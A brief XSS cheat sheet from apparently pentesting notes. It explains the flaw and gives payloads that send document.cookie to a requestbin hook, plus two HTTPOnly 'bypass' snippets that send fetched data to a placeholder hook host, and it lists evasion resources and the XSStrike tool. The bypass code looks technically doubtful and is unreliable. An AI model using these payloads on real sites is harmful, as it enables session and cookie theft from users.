XSS
The XSS vulnerability occurs when a user can control the content of a web page. A malicious code can be used to steal cookies of authentified users, redirect the user to a malicious site, or even execute arbitrary code on the user’s machine.
Example of XSS :
<img src="#" onerror="document.location='http://requestbin.fullcontact.com/168r30u1?c' + document.cookie">
These sites can be used to create hooks to catch HTTP requests:
Site |
---|
requestb.in |
hookbin.com |
XSS Cheat sheet
- CheatSheetFilter Evasion
- CheatSheetBypass XSS filters.
HTTPOnly cookie flag
When the
HTTPOnly
flag is set, the cookie is not accessible by JavaScript. This can be bypassed by using the target’s browser as a proxy to receive the cookie when it is sent to the victim’s browser:<!-- With the script tag --> <script> fetch("https://target-site.url/") .then((data) => fetch("https://<myHook>/?/=".concat(JSON.stringify(data)), { credentials: 'include' })); </script> <!-- With an image --> <img src="https://target-site.url/" onerror="fetch('https://<myHook>/?/='+JSON.stringify(this), { credentials: 'include' })">
XSStrike
- GitHubA python CLI tool for XSS detection and exploitation.